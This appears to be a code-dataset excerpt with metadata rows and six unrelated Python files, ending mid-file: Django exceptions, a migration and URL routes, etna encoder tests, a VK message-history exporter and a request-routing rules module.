| 37.805556 | 86 | 0.709405 | 369 | 2,722 | 5.03523 | 0.311653 | 0.052745 | 0.062971 | 0.082347 | 0.092573 | 0.057589 | 0.041981 | 0.041981 | 0 | 0 | 0 | 0.032599 | 0.199853 | 2,722 | 71 | 87 | 38.338028 | 0.820478 | 0.161646 | 0 | 0.043478 | 0 | 0 | 0.061607 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 1 | 0.086957 | false | 0.130435 | 0.065217 | 0 | 0.23913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
52b2cef2321b28d9b382b11b584f50285ddca3b9 | 482 | py | Python | api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | ea47ccbdadf665a806ae4e0eff6ad1a2f1b0ba19 | [
"BSD-3-Clause"
] | 126 | 2019-12-13T18:41:43.000Z | 2020-11-10T13:33:55.000Z | api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | ea47ccbdadf665a806ae4e0eff6ad1a2f1b0ba19 | [
"BSD-3-Clause"
] | 30 | 2019-12-12T16:52:01.000Z | 2020-11-09T18:55:29.000Z | api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | ea47ccbdadf665a806ae4e0eff6ad1a2f1b0ba19 | [
"BSD-3-Clause"
] | 20 | 2020-02-14T21:55:36.000Z | 2020-11-03T22:29:03.000Z | from rest_framework import status
from rest_framework.exceptions import APIException
class FeatureStateVersionError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
class FeatureStateVersionAlreadyExistsError(FeatureStateVersionError):
status_code = status.HTTP_400_BAD_REQUEST
def __init__(self, version: int):
super(FeatureStateVersionAlreadyExistsError, self).__init__(
f"Version {version} already exists for FeatureState."
)
| 30.125 | 70 | 0.786307 | 47 | 482 | 7.680851 | 0.553191 | 0.044321 | 0.094183 | 0.110803 | 0.182825 | 0.182825 | 0.182825 | 0 | 0 | 0 | 0 | 0.014778 | 0.157676 | 482 | 15 | 71 | 32.133333 | 0.874384 | 0 | 0 | 0.2 | 0 | 0 | 0.103734 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
52b53fc840acc1bf09eb244812212a0134629fbd | 11,030 | py | Python | tests/test_transforms/test_encoders/test_categorical_transform.py | Pacman1984/etna | 9b3ccb980e576d56858f14aca2e06ce2957b0fa9 | [
"Apache-2.0"
] | 96 | 2021-09-05T06:29:34.000Z | 2021-11-07T15:22:54.000Z | tests/test_transforms/test_encoders/test_categorical_transform.py | Pacman1984/etna | 9b3ccb980e576d56858f14aca2e06ce2957b0fa9 | [
"Apache-2.0"
] | 188 | 2021-09-06T15:59:58.000Z | 2021-11-17T09:34:16.000Z | tests/test_transforms/test_encoders/test_categorical_transform.py | Pacman1984/etna | 9b3ccb980e576d56858f14aca2e06ce2957b0fa9 | [
"Apache-2.0"
] | 8 | 2021-09-06T09:18:35.000Z | 2021-11-11T21:18:39.000Z | import numpy as np
import pandas as pd
import pytest
from etna.datasets import TSDataset
from etna.datasets import generate_ar_df
from etna.datasets import generate_const_df
from etna.datasets import generate_periodic_df
from etna.metrics import R2
from etna.models import LinearPerSegmentModel
from etna.transforms import FilterFeaturesTransform
from etna.transforms.encoders.categorical import LabelEncoderTransform
from etna.transforms.encoders.categorical import OneHotEncoderTransform
@pytest.fixture
def two_df_with_new_values():
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 5, 9, 5, 9],
"target": [1, 2, 3, 4, 5, 6],
}
df1 = TSDataset.to_dataset(pd.DataFrame(d))
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 9, 5, 0, 0],
"target": [1, 2, 3, 4, 5, 6],
}
df2 = TSDataset.to_dataset(pd.DataFrame(d))
return df1, df2
@pytest.fixture
def df_for_ohe_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test_0"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 5))
answer_on_regressor_0["test_1"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test_0"] = answer_on_regressor_0["test_0"].astype("category")
answer_on_regressor_0["test_1"] = answer_on_regressor_0["test_1"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test_0"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 5))
answer_on_regressor_1["test_1"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test_0"] = answer_on_regressor_1["test_0"].astype("category")
answer_on_regressor_1["test_1"] = answer_on_regressor_1["test_1"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test_0"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 0))
answer_on_regressor_2["test_0"] = answer_on_regressor_2["test_0"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_label_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test"] = answer_on_regressor_0["test"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test"] = answer_on_regressor_1["test"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 1))
answer_on_regressor_2["test"] = answer_on_regressor_2["test"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_naming():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
df_regressors = generate_periodic_df(12, start_time="2021-01-01", scale=10, period=2, n_segments=2)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + ["regressor_1", "2"]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return tsdataset.df
def test_label_encoder_simple(df_for_label_encoding):
    """Test that LabelEncoderTransform works correctly in simple cases."""
df, answers = df_for_label_encoding
for i in range(3):
le = LabelEncoderTransform(in_column=f"regressor_{i}", out_column="test")
le.fit(df)
cols = le.transform(df)["segment_0"].columns
assert le.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_ohe_encoder_simple(df_for_ohe_encoding):
    """Test that OneHotEncoderTransform works correctly in a simple case."""
df, answers = df_for_ohe_encoding
for i in range(3):
ohe = OneHotEncoderTransform(in_column=f"regressor_{i}", out_column="test")
ohe.fit(df)
cols = ohe.transform(df)["segment_0"].columns
assert ohe.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_value_error_label_encoder(df_for_label_encoding):
"""Test LabelEncoderTransform with wrong strategy."""
df, _ = df_for_label_encoding
with pytest.raises(ValueError, match="The strategy"):
le = LabelEncoderTransform(in_column="target", strategy="new_vlue")
le.fit(df)
le.transform(df)
@pytest.mark.parametrize(
"strategy, expected_values",
[
("new_value", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, -1, 5], [9, -1, 3, 0, -1, 6]])),
("none", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, np.nan, 5], [9, np.nan, 3, 0, np.nan, 6]])),
("mean", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, 0, 5], [9, 0.5, 3, 0, 0, 6]])),
],
)
def test_new_value_label_encoder(two_df_with_new_values, strategy, expected_values):
    """Test that LabelEncoderTransform works correctly with unknown values."""
df1, df2 = two_df_with_new_values
le = LabelEncoderTransform(in_column="regressor_0", strategy=strategy)
le.fit(df1)
np.testing.assert_array_almost_equal(le.transform(df2).values, expected_values)
def test_new_value_ohe_encoder(two_df_with_new_values):
    """Test that OneHotEncoderTransform works correctly with unknown values."""
expected_values = np.array(
[
[5.0, 1.0, 1.0, 0.0, 5.0, 4.0, 1.0, 0.0],
[8.0, 2.0, 0.0, 1.0, 0.0, 5.0, 0.0, 0.0],
[9.0, 3.0, 0.0, 0.0, 0.0, 6.0, 0.0, 0.0],
]
)
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
np.testing.assert_array_almost_equal(ohe.transform(df2).values, expected_values)
def test_naming_ohe_encoder(two_df_with_new_values):
"""Test OneHotEncoderTransform gives the correct columns."""
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
segments = ["segment_0", "segment_1"]
target = ["target", "targets_0", "targets_1", "regressor_0"]
assert set([(i, j) for i in segments for j in target]) == set(ohe.transform(df2).columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_ohe_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test OneHotEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
ohe = OneHotEncoderTransform(in_column=in_column)
ohe.fit(df)
answer = set(
        list(df["segment_0"].columns) + [prefix + repr(ohe) + "_0", prefix + repr(ohe) + "_1"]
)
assert answer == set(ohe.transform(df)["segment_0"].columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_label_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test LabelEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
le = LabelEncoderTransform(in_column=in_column)
le.fit(df)
    answer = set(list(df["segment_0"].columns) + [prefix + repr(le)])
assert answer == set(le.transform(df)["segment_0"].columns.values)
@pytest.fixture
def ts_for_ohe_sanity():
df_to_forecast = generate_const_df(periods=100, start_time="2021-01-01", scale=0, n_segments=1)
df_regressors = generate_periodic_df(periods=120, start_time="2021-01-01", scale=10, period=4, n_segments=1)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + [f"regressor_{i}" for i in range(1)]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
rng = np.random.default_rng(12345)
def f(x):
return x ** 2 + rng.normal(0, 0.01)
df_to_forecast["segment_0", "target"] = df_regressors["segment_0"]["regressor_0"][:100].apply(f)
ts = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return ts
def test_ohe_sanity(ts_for_ohe_sanity):
"""Test for correct work in the full forecasting pipeline."""
horizon = 10
train_ts, test_ts = ts_for_ohe_sanity.train_test_split(test_size=horizon)
ohe = OneHotEncoderTransform(in_column="regressor_0")
filt = FilterFeaturesTransform(exclude=["regressor_0"])
train_ts.fit_transform([ohe, filt])
model = LinearPerSegmentModel()
model.fit(train_ts)
future_ts = train_ts.make_future(horizon)
forecast_ts = model.forecast(future_ts)
r2 = R2()
assert 1 - r2(test_ts, forecast_ts)["segment_0"] < 1e-5
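The encoder tests above pin down expected outputs, including the `new_value` strategy for categories unseen at fit time. The behavior being asserted can be sketched in plain Python, independent of etna — this is a simplified illustration, not etna's actual implementation, and `fit_labels`, `label_encode` and `one_hot_encode` are made-up names:

```python
def fit_labels(values):
    # Map each distinct value, in first-seen order, to an integer label.
    labels = {}
    for v in values:
        if v not in labels:
            labels[v] = len(labels)
    return labels

def label_encode(labels, values, strategy="new_value"):
    # Unknown values become -1 under "new_value" and None under "none".
    out = []
    for v in values:
        if v in labels:
            out.append(labels[v])
        elif strategy == "new_value":
            out.append(-1)
        elif strategy == "none":
            out.append(None)
        else:
            raise ValueError("The strategy '%s' is unknown" % strategy)
    return out

def one_hot_encode(labels, values):
    # One indicator column per known label; unknown values yield all zeros.
    return [[1.0 if labels.get(v) == i else 0.0 for i in range(len(labels))]
            for v in values]

labels = fit_labels([5, 8, 5, 9])          # {5: 0, 8: 1, 9: 2}
encoded = label_encode(labels, [5, 8, 7])  # [0, 1, -1]
onehot = one_hot_encode(labels, [5, 7])    # [[1.0, 0.0, 0.0], [0.0, 0.0, 0.0]]
```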
# === platform/core/polyaxon/db/migrations/0017_auto_20190104_2032.py (hackerwins/polyaxon, Apache-2.0) ===
# Generated by Django 2.1.3 on 2019-01-04 20:32
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import libs.spec_validation
class Migration(migrations.Migration):
dependencies = [
('db', '0016_experimentjob_sequence_and_deleted_flag_tpu_resources'),
]
operations = [
migrations.AddField(
model_name='buildjob',
name='persistence',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='The persistence definition.', null=True, validators=[libs.spec_validation.validate_persistence_config]),
),
migrations.AddField(
model_name='project',
name='persistence',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='The persistence definition.', null=True, validators=[libs.spec_validation.validate_persistence_config]),
),
migrations.AlterField(
model_name='nodegpu',
name='memory',
field=models.BigIntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='nodegpu',
name='name',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='nodegpu',
name='serial',
field=models.CharField(blank=True, max_length=256, null=True),
),
]
# === webserver/testserver/main/urls.py (frankovacevich/aleph, MIT) ===
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('home', views.home, name='home'),
path('login', views.ulogin, name='login'),
path('logout', views.ulogout, name='logout'),
path('password_change', views.password_change, name='password_change'),
# path('users', views.users, name='users'),
path('explorer', views.explorer, name='explorer'),
# path('reports/base_report', views.resources, name='reports'),
# path('docs', views.docs, name='docs'),
]
# === exporter.py (mrDoctorWho/VK-Exporter, MIT) ===
#!/usr/bin/env python2
# coding: utf-8
# based on the vk4xmpp gateway, v2.25
# © simpleApps, 2013 — 2014.
# Program published under MIT license.
import gc
import json
import logging
import os
import re
import signal
import sys
import threading
import time
import urllib
core = getattr(sys.modules["__main__"], "__file__", None)
if core:
core = os.path.abspath(core)
root = os.path.dirname(core)
if root:
os.chdir(root)
sys.path.insert(0, "library")
reload(sys).setdefaultencoding("utf-8")
from datetime import datetime
from webtools import *
from writer import *
from stext import *
from stext import _
setVars("ru", root)
Semaphore = threading.Semaphore()
LOG_LEVEL = logging.DEBUG
EXTENSIONS = []
MAXIMUM_FORWARD_DEPTH = 100
pidFile = "pidFile.txt"
logFile = "vk4xmpp.log"
crashDir = "crash"
PhotoSize = "photo_100"
logger = logging.getLogger("vk4xmpp")
logger.setLevel(LOG_LEVEL)
loggerHandler = logging.FileHandler(logFile)
formatter = logging.Formatter("%(asctime)s:%(levelname)s:%(name)s %(message)s",
"[%d.%m.%Y %H:%M:%S]")
loggerHandler.setFormatter(formatter)
logger.addHandler(loggerHandler)
import vkapi as api
## Escaping xmpp non-allowed chars
badChars = [x for x in xrange(32) if x not in (9, 10, 13)] + [57003, 65535]
escape = re.compile("|".join(unichr(x) for x in badChars), re.IGNORECASE | re.UNICODE | re.DOTALL).sub
sortMsg = lambda msgOne, msgTwo: msgOne.get("mid", 0) - msgTwo.get("mid", 0)
require = lambda name: os.path.exists("extensions/%s.py" % name)
def registerHandler(type, handler):
EXTENSIONS.append(handler)
def loadExtensions(dir):
"""
Read and exec files located in dir
"""
for file in os.listdir(dir):
if not file.startswith("."):
execfile("%s/%s" % (dir, file), globals())
def execute(handler, list=()):
try:
result = handler(*list)
except SystemExit:
result = 1
except Exception:
result = -1
crashLog(handler.func_name)
return result
def apply(instance, args=()):
try:
code = instance(*args)
except Exception:
code = None
return code
def runThread(func, args=(), name=None):
thr = threading.Thread(target=execute, args=(func, args), name=name or func.func_name)
try:
thr.start()
except threading.ThreadError:
        crashLog("runThread.%s" % name)
class VK(object):
"""
    The base class contains most of the functions needed to work with VK
"""
def __init__(self):
self.online = False
self.userID = 0
self.friends_fields = set(["screen_name"])
logger.debug("VK.__init__")
getToken = lambda self: self.engine.token
def checkData(self):
"""
Checks the token or authorizes by password
Raises api.TokenError if token is invalid or missed in hell
Raises api.VkApiError if phone/password is invalid
"""
logger.debug("VK: checking data")
if self.engine.token:
logger.debug("VK.checkData: trying to use token")
if not self.checkToken():
logger.error("VK.checkData: token invalid: %s" % self.engine.token)
raise api.TokenError("Token is invalid: %s" % (self.engine.token))
else:
raise api.TokenError("%s, Where the hell is your token?" % self.source)
def checkToken(self):
"""
Checks the api token
"""
try:
int(self.method("isAppUser", force=True))
except (api.VkApiError, TypeError):
return False
return True
def auth(self, token=None, raise_exc=False):
"""
Initializes self.engine object
Calls self.checkData() and initializes longPoll if all is ok
"""
logger.debug("VK.auth %s token" % ("with" if token else "without"))
self.engine = api.APIBinding(token=token)
try:
self.checkData()
except api.AuthError as e:
logger.error("VK.auth failed with error %s" % (e.message))
if raise_exc:
raise
return False
except Exception:
crashLog("VK.auth")
return False
logger.debug("VK.auth completed")
self.online = True
return True
def method(self, method, args=None, nodecode=False, force=False):
"""
This is a duplicate function of self.engine.method
Needed to handle errors properly exactly in __main__
Parameters:
method: obviously VK API method
        args: method arguments
nodecode: decode flag (make json.loads or not)
force: says that method will be executed even the captcha and not online
See library/vkapi.py for more information about exceptions
Returns method result
"""
args = args or {}
result = {}
if not self.engine.captcha and (self.online or force):
try:
result = self.engine.method(method, args, nodecode)
except api.InternalServerError as e:
logger.error("VK: internal server error occurred while executing method(%s) (%s)" % (method, e.message))
except api.NetworkNotFound:
                logger.critical("VK: network is unavailable. Is vk down or do you have network problems?")
self.online = False
except api.VkApiError as e:
logger.error("VK: apiError %s" % (e.message))
self.online = False
return result
def disconnect(self):
"""
Stops all user handlers and removes himself from Poll
"""
logger.debug("VK: user has left")
self.online = False
runThread(self.method, ("account.setOffline", None, True, True))
def getFriends(self, fields=None):
"""
Executes friends.get and formats it in key-values style
        Example: {1: {"name": "Pavel Durov", "online": False}}
Parameter fields is needed to receive advanced fields which will be added in result values
"""
fields = fields or self.friends_fields
raw = self.method("friends.get", {"fields": str.join(chr(44), fields)}) or ()
friends = {}
for friend in raw:
uid = friend["uid"]
online = friend["online"]
name = escape("", str.join(chr(32), (friend["first_name"], friend["last_name"])))
friends[uid] = {"name": name, "online": online}
for key in fields:
if key != "screen_name": # screen_name is default
friends[uid][key] = friend.get(key)
return friends
def getMessages(self, count=5, mid=0):
"""
Gets last messages list count 5 with last id mid
"""
values = {"out": 0, "filters": 1, "count": count}
if mid:
del values["count"], values["filters"]
values["last_message_id"] = mid
return self.method("messages.get", values)
def getUserID(self):
"""
Gets user id and adds his id into jidToID
"""
self.userID = self.method("execute.getUserID")
return self.userID
def getUserData(self, uid, fields=None):
"""
Gets user data. Such as name, photo, etc
Will request method users.get
Default fields is ["screen_name"]
"""
if not fields:
fields = self.friends_fields
data = self.method("users.get", {"fields": ",".join(fields), "user_ids": uid}) or {}
if not data:
data = {"name": "None"}
for key in fields:
data[key] = "None"
else:
data = data.pop()
data["name"] = escape("", str.join(chr(32), (data.pop("first_name"), data.pop("last_name"))))
return data
def getMessageHistory(self, count, uid, rev=0, start=0):
"""
Gets messages history
"""
values = {"count": count, "user_id": uid, "rev": rev, "start": start}
return self.method("messages.getHistory", values)
format = "[%(date)s] <%(name)s> %(body)s\n"
if not os.path.exists("logs"):
os.makedirs("logs")
loadExtensions("extensions")
# https://oauth.vk.com/authorize?scope=69638&redirect_uri=https%3A%2F%2Foauth.vk.com%2Fblank.html&display=mobile&client_id=3789129&response_type=token
print "\nYou can get token over there: http://jabberon.ru/vk4xmpp.html"
token = raw_input("\nToken: ")
class User:
"""
A compatibility layer for vk4xmpp-extensions
"""
vk = VK()
user = User()
user.vk.auth(token)
user.vk.friends = user.vk.getFriends()
for friend in user.vk.friends.keys():
file = open("logs/%d.txt" % friend, "w")
start = 0
while True:
count = 200
rev = 0
messages = sorted(user.vk.getMessageHistory(count, friend, rev, start)[1:], sortMsg)
print "receiving messages for %d" % friend
if not messages or not messages[0]:
print "no messages for %d" % friend
file.close()
os.remove("logs/%d.txt" % friend)
break
last = messages[0]["mid"]
if last == start:
start = 0
break
start = last
for message in messages:
body = uHTML(message["body"])
iter = EXTENSIONS.__iter__()
for func in iter:
try:
result = func(user, message)
except Exception:
result = None
crashLog("handle.%s" % func.__name__)
if result is None:
for func in iter:
apply(func, (user, message))
break
else:
body += result
date = datetime.fromtimestamp(message["date"]).strftime("%d.%m.%Y %H:%M:%S")
name = user.vk.getUserData(message["from_id"])["name"]
file.write(format % vars())
print "Done. Check out the \"logs\" directory"
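exporter.py above builds its `escape` substitution from the code points that XMPP/XML disallow. The same technique in isolation — here restricted to the ASCII control range; the real table also strips a couple of higher code points and uses extra regex flags:

```python
import re

# Control characters are not allowed in XML streams, except
# tab (9), newline (10) and carriage return (13).
bad_chars = [x for x in range(32) if x not in (9, 10, 13)]
escape = re.compile("|".join(chr(x) for x in bad_chars)).sub

cleaned = escape("", "hello\x00world\x07")  # control chars removed: "helloworld"
```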
# === rump/rule.py (bninja/rump, 0BSD) ===
import collections
import logging
import StringIO
from . import exc, Request, Expression
logger = logging.getLogger(__name__)
class CompiledRule(object):
"""
Compiled version of a routing rule.
`symbols`
A `rump.fields.Symbols` table used to store symbolic information used
in the compiled rule.
`expression`
The `rump.fields.Expression` which has been compiled.
`compiled`
Byte code for evaluating a `rump.fields.Expression`.
`upstream`
The `rump.Upstream` to be returned on a match.
You don't usually need to create these directly. Instead grab them from
the source `rump.Rule` like:
my_compiled_rule = rump.parser.for_rule()("my-rule-string").compile()
"""
def __init__(self, expression, upstream, symbols=None):
self.expression = expression
self.upstream = upstream
self.symbols = (
self.expression.symbols() if symbols is None else symbols
)
self.compiled = compile(
expression.compile(self.symbols), '<string>', 'eval'
)
def match_context(self, request_context):
"""
Determines whether a request represented by a context matches this rule.
:param context: A `rump.RequestContext`.
:return rump.Upstream:
If the request matches this rule then the associated upstream is
returned, otherwise None.
"""
matched = eval(self.compiled, None, request_context)
return self.upstream if matched else None
def match(self, request):
"""
Determines whether a request matches this rule.
:param request: A `rump.Request`.
:return rump.Upstream:
If the request matches this rule then the associated upstream is
returned, otherwise None.
"""
matched = self.match_context(request.context(self.symbols))
return self.upstream if matched else None
def __str__(self):
return '{0} => {1}'.format(str(self.expression), str(self.upstream))
def __eq__(self, other):
return (
isinstance(other, (Rule, CompiledRule)) and
self.expression == other.expression and
self.upstream == other.upstream
)
def __ne__(self, other):
return not self.__eq__(other)
class Rule(object):
"""
Represents a "routing" rule used to match requests to an upstream.
`expression`
A `rump.fields.Expression`.
`upstream`
The `rump.Upstream` to be returned on a match.
There are two ways to express a Rule:
- A `rump.fields.Expression`.
- String, see `rump.rule.grammar` for the grammar.
If you have a string just do something like:
rule = rump.parser.for_rule()("my-rule-string")
"""
compiled_type = CompiledRule
def __init__(self, expression, upstream):
self.expression = expression
self.upstream = upstream
def match(self, request):
"""
Determines whether a request matches this rule.
:param request: The rump.Request to evaluate for a match.
:return rump.Upstream:
If the request matches this rule then the associated upstream is
returned, otherwise None.
"""
matched = self.expression(request)
return self.upstream if matched else None
def compile(self, symbols=None):
"""
Compiles this rule.
:param symbols:
A `rump.fields.Symbols` table used to store symbolic information
used in the compiled rule.
:return CompiledRule: The equivalent compiled rule.
"""
return CompiledRule(self.expression, self.upstream, symbols)
def __str__(self):
return '{0} => {1}'.format(self.expression, self.upstream)
def __eq__(self, other):
return (
isinstance(other, (Rule, CompiledRule)) and
self.expression == other.expression and
self.upstream == other.upstream
)
def __ne__(self, other):
return not self.__eq__(other)
class Rules(collections.MutableSequence):
"""
A collection of "routing" rules used to match requests to an upstream.
`request_type`
Specification of the requests these rules will be matching. Defaults
to `rump.Request`.
`compile`
Flag determining whether added rules are compiled.
`strict`
        Flag determining whether parse errors when loading rules raise, or are logged and the rule skipped.
`auto_disable`
Flag determining whether to auto disable a rule that generates and
error when attempting to match a request.
"""
def __init__(self, *rules, **options):
self._parse_rule = None
self.symbols = None
self._compile = False
self.disabled = set()
self._rules = []
if len(rules) == 1 and isinstance(rules[0], list):
rules = rules[0]
for rule in rules:
self._rules.append(rule)
# options
self.request_type = options.pop('request_type', Request)
self.compile = options.pop('compile', False)
self.strict = options.pop('strict', True)
self.auto_disable = options.pop('auto_disable', False)
if options:
raise TypeError(
'Unexpected keyword argument {0}'.format(options.keys()[0])
)
@property
def compile(self):
return self._compile
@compile.setter
def compile(self, value):
if value == self._compile:
return
self._compile = value
if self._compile:
self.symbols = Expression.symbols()
for i in xrange(len(self)):
self[i] = Rule(
self[i].expression, self[i].upstream
).compile(self.symbols)
else:
self.symbols = None
for i in xrange(len(self)):
self[i] = Rule(self[i].expression, self[i].upstream)
@property
def parse_rule(self):
from . import parser
if not self._parse_rule:
self._parse_rule = parser.for_rule(self.request_type)
return self._parse_rule
def load(self, io, strict=None):
strict = self.strict if strict is None else strict
for i, line in enumerate(io):
line = line.strip()
if not line or line.startswith('#'):
continue
try:
rule = self.parse_rule(line)
except exc.ParseException, ex:
if strict:
raise
logger.warning(
'%s, line %s, unable to parse rule - %s, skipping',
getattr(io, 'name', '<memory>'), i, ex,
)
continue
self.append(rule)
return self
def loads(self, s, strict=None):
io = StringIO.StringIO(s)
return self.load(io, strict=strict)
def dump(self, io):
for rule in self:
io.write(str(rule))
io.write('\n')
def dumps(self):
io = StringIO.StringIO()
self.dump(io)
return io.getvalue()
def disable(self, i):
self.disabled.add(self[i])
def disable_all(self):
self.disabled = set(self)
def enable(self, i):
self.disabled.remove(self[i])
def enable_all(self):
self.disabled.clear()
def match(self, request, error=None):
if error is None:
error = 'suppress' if self.auto_disable is False else 'disable'
if error not in ('raise', 'disable', 'suppress'):
raise ValueError('error={0} invalid'.format(error))
return (
self._match_compiled if self.compile else self._match
)(request, error)
def _match_compiled(self, request, error):
i, count, request_ctx = 0, len(self), request.context(self.symbols)
while True:
try:
while i != count:
if self[i] not in self.disabled:
upstream = self[i].match_context(request_ctx)
if upstream:
return upstream
i += 1
break
except StandardError:
raise
except Exception as ex:
if error == 'raise':
raise
logger.exception('[%s] %s match failed - %s\n', i, self[i], ex)
if error == 'disable':
self.disabled.add(self[i])
i += 1
def _match(self, request, error):
i, count = 0, len(self)
while True:
try:
while i != count:
if self[i] not in self.disabled:
upstream = self[i].match(request)
if upstream:
return upstream
i += 1
break
except StandardError:
raise
except Exception as ex:
if error == 'raise':
raise
                logger.exception('[%s] %s match failed - %s\n', i, self[i], ex)
if error == 'disable':
self.disabled.add(self[i])
i += 1
def __str__(self):
return str(self._rules)
def __eq__(self, other):
return (
(isinstance(other, Rules) and self._rules == other._rules) or
(isinstance(other, list) and self._rules == other)
)
def __ne__(self, other):
return not self.__eq__(other)
# collections.MutableSequence
def __getitem__(self, key):
return self._rules[key]
def __setitem__(self, key, value):
if isinstance(value, basestring):
rule = self.parse_rule(value)
elif isinstance(value, Rule):
rule = value
elif isinstance(value, Rule.compiled_type):
rule = Rule(value.expression, value.upstream)
else:
raise TypeError(
'{0} is not a string, Rule or CompiledRule'.format(value)
)
if self.compile:
rule = rule.compile(self.symbols)
self._rules[key] = rule
def __delitem__(self, key):
